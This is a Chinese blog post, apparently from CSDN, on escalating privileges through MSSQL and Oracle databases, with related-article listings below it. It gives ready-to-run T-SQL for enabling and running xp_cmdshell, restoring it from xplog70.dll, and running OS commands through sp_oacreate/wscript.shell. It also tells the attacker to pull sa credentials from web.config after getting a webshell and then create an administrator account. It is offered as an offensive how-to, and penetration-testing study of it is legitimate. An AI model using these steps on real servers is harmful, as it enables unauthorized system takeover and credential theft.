提权 - MSSQL/Oracle数据库

最新推荐文章于 2024-05-17 08:53:31 发布
最新推荐文章于 2024-05-17 08:53:31 发布
阅读量438 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acepanhuan/article/details/129263523
版权

提权 - MSSQL/Oracle数据库

提权方法

1.MSSQL数据库提权方法

MSSQL注入攻击过程中,最长利用的扩展存储如下:
在这里插入图片描述

xp_cmdshell
  xp_cmdshell(数据库-系统数据库-mater-可编程性-系统扩展存储过程)默认在mssql2000中是开启的,在mssql2005之后的版本中则是默认禁止的,如果用户拥有管理员sa权限(MSSQL最高权限)则可以用sp_congifgure重新开启它.
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出,从而达到期权目的。

启用:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

关闭:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

执行:
EXEC master.dbo.xp_cmdshell '命令'

如果 xp_cmdshell 被删除了,可以上传 xplog70.dll 进行恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll'

sp_oacreate
主要用来调用OLE对象,利用OLE对象的run方法执行系统命令。

沙盒模式/sp_oamethod提权

2.Oracle数据库提权方法

普通用户
DBA用户
注入模式
这三种方法可以使用自动化工具(Oracleshell)来完成提权。

演示

1.MSSQL xp_cmdshell 提权

1.通过配置文件找到数据库账户密码
MSSQL默认都支持外连
获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使用sa连接数据库),一般情况下,.net的站点数据库连接字符串在web.config或者和global.aspx也有可能是编译在DLL文件当中。
在这里插入图片描述
2.通过MSSQL客户端进行连接
在这里插入图片描述
3.在系统扩展存储过程中,查看是否开启 xp_cmdshell。
在这里插入图片描述
4.开启xp_cmdshell
在这里插入图片描述
5.利用xp_cmdshell执行命令,whoami命令返回 system,可以执行命令创建一个管理员账户。
在这里插入图片描述

2.MSSQL sp_oacreate提权
启用:
EXEC sp_configure 'show advanced options' ,1;
Reconfigure with override;
EXEC sp_configure 'Ole Automation Procedures',1;
Reconfigure with override;
关闭:
EXEC sp_configure 'show advanced options' ,1;
Reconfigure with override;
EXEC sp_configure 'Ole Automation Procedures',0;
Reconfigure with override;
执行:
delare @shell int exec sp_oacreate 'wscript.shell',@shell
output exec sp_oamethod @shell ,'run',null,'c:\windows\system32\
cmd.exe /c whoami >c:\\1.exe'

这个方法不支持回显,所以执行命令需要把回显内容重定向到一个文本中,但实际提权过程中,都是写创建账号密码,这点不影响。
在这里插入图片描述
在这里插入图片描述

acepanhuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Oracle 数据库 - PL/SQL 游标
徐小mu的博客
12-12 1505
目录 PL/SQL 游标 1、显式游标 1)、声明游标 2)、打开游标 3)、读取游标 4)、关闭游标 2、游标属性 3、隐式游标 4、通过 for 语句循环游标 实例——使用游标查询工资小于 1000 元的员工工资 实验:游标提取比指定员工工资少的员工信息 PL/SQL 游标 游标提供了一种从表中检索数据并进行操作的灵活手段,游标主要用在服务器上,处理由客户...
Oracle数据库 -- 子查询篇
SunMoonJP的博客
02-08 1401
课程目标: 子查询概述 子查询的使用 子查询的类型 子查询注意的10个问题1. 子查询语法中的小括号 2. 子查询的书写风格 3. 可以使用子查询的位置:where,select,having,from 4. 不可以使用子查询的位置:group by 5. 强调 : from后面的子查询 6. 主查询和子查询可以不是同一张表 7. 一般不在子查询中,使用排序;但在Top-N分析问题中,
Windows提权:利用MSSQL数据库Oracle数据库
qq_61553520的博客
05-30 1563
MSSQL数据库提权总结归纳:MSSQL数据库三种提权方式都是死的:固定得命令执行三种提权方式都是通过web权限查看配置文件的方式获取到MSSQL数据库的账号密码,再进行提权的,MSSQL数据库是默认允许外链的,我们获得sa账户密码后,可以直接远程登录数据库。再数据库SQL语句执行环境进行提权的。Oracle数据库的利用就很简单,工具梭哈即可。
oracle提权工具-oracleShell.zip
05-04
oracle提权工具
Oracle数据库漏洞与提权防护:守护企业数据安全的指南
最新发布
2401_84968371的博客
05-17 400
通过本文的详细讲解和实例演示,我们可以看到Oracle数据库漏洞的预防及其提权防护策略在保障企业数据安全方面的重要性。合理配置Oracle数据库安全策略,可以降低数据库被攻击的风险。随着技术的不断进步,我们有理由相信,Oracle数据库安全防护技术将在未来发挥更大的作用,为企业和组织提供更加高效和便捷的数据安全保障。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
mssql&oracle数据库提权
m0_62207170的博客
03-19 1134
mssql&oracle数据库提权
Oracle提权
YouthBelief的博客
12-19 2844
三种方式 1.普通用户模式: 拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令 2.DBA用户模式:(自动化工具) sqlmap --is-dba 测试是否是dba权限 拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试 3.注入提升模式:(sqlmap) 拥有一个oracle注入点,可以通过注入点执行系统命令,此种模式没有实现回显,需要自己验证。 三种方式的提权工具 ...
Windows提权之Mssql(sql server)数据库提权(xp_cmdshell提权)
mrx56的博客
05-18 1173
利用大马或者webshell管理工具登录mssql数据库,执行以下sql命令检查xp_cmdshell是否存在。也可以利用SQL注入。如果xplog70.dll也删除了可以自己上传一个或者执行以下命令恢复。结果为1,则证明存在。当结果为0时,可以通过下列命令恢复。使用xp_cmdshel执行命令。
【内网安全】——数据库提权姿势
Demo不是emo的博客
02-10 2467
数据库提权姿势汇总
Jsp JDBC连接MsSQL/MYSQL/Oracle各种数据库代码集.rar
07-10
Jsp JDBC连接MsSQL/MYSQL/Oracle各种数据库代码集,采用多种方式连接各种常用的数据库:  1.连接ACCESS  http://127.0.0.1:8080/Access/access.jsp    2.连接SQL Server2000  ...
Veeam 备份恢复oracle数据库详细配置文档
10-07
Veeam 备份恢复 Oracle 数据库详细配置文档 本文档旨在详细介绍如何使用 Veeam 备份恢复 Oracle 数据库的配置过程。该文档将指导读者从环境准备到推送 Oracle RMAN Plugin,再到创建备份作业和运行备份作业,最后...
JDBC连接MsSQL/MYSQL/Oracle等多数据库的JSP代码.rar
07-04
本压缩包内含有MSSQL数据库备份文件,以及基于JDBC连接MsSQL/MYSQL/Oracle/Access等常用数据库的示例代码,比较经典的低级问题,笔者也曾遇到过当初学JSp的时候,曾经因为不会连接数据库而很苦恼,这次你可参考...
计算机软件-商业源码-可以查看所有mssqloracle数据库中的表数据.zip
05-23
标题和描述中提到的"计算机软件-商业源码-可以查看所有mssqloracle数据库中的表数据.zip"是一个包含源代码的压缩包,主要用于查看Microsoft SQL Server (MSSQL)和Oracle数据库中的表数据。这个软件可能是一个轻量...
JSP连接MySql/MS SQL Server/Oracle数据库连接方法[整理]
10-30
个经常整理更新
Oracle/MSSQL 数据库编码转换多功能导入工具(终板)
09-16
Oracle/MSSQL 对称/不对称 导入 并且导入时: 可以转换编码(Big5/GBK) 可以替换字段内容 更可以不导入数据库,只导出为SQL(Insert)语句,等功能 ----------------------------------------------- 大小: 122880 ...
mssql_mysql_orale.rar_mssql_oracle_数据库工具_数据库查询
09-24
Oracle还有一款名为SQL Developer的工具,专为Oracle数据库设计,支持数据查询、管理、迁移和开发。 当涉及到跨平台的数据库查询时,我们通常会用到一些通用的数据库查询工具。这些工具可以连接到多种类型的数据库...
Mssql常规提权[xp_cmdshell]
qq_31812157的博客
06-22 273
提权没什么好说的,主要是执行命令的之后的利用。
提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权
热门推荐
fendo
03-29 1万+
(一)、Mssql提权 必要条件:获取到mssql数据库最高权限用户sa的账号密码 Mssql默认端口:1433 Mssql最高权限用户:sa 得到sa密码之后,通过工具直接连接上去。 MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。 (二)、GetPass 提权 一款获取计算机
MSSQL提权
m0_72929851的博客
04-09 224
默认库判断服务器级别判断数据库级别。
Oracle数据库设计与编码规范
"Oracle数据库设计规范" Oracle数据库设计规范是确保软件开发过程中数据库一致性、可维护性和高效性的关键。这份规范适用于所有开发人员,贯穿于软件项目的数据库设计和维护阶段。规范涵盖了数据库对象的物理结构和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值